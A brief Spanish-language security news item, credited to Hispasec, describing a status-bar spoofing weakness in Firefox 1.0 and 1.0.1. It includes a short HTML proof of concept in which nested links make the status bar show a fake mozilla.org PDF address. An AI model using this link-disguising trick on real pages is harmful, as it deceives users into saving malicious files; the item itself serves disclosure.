Falsificación de barra de estado en Firefox

Se ha descubierto una debilidad en el navegador Firefox que puede
ser explotada por atacantes remotos para incitar a usuarios para
que salven archivos maliciosos al ofuscar las URLs en la barra de
estado. Se ha comprobado que el problema está presente en la versión 1.0 y 1.0.1 del navegador.

<a href="http://www.mozilla.org/informacion.pdf">
<table><tr><td>
<a href="about:mozilla"> http://www.mozilla.org/informacion.pdf
</a><!-- Cerrar primer enlace -->
</td></tr></table>
</a><!-- Cerrar segundo enlace -->

Fuente: Hispasec.

Deja un comentario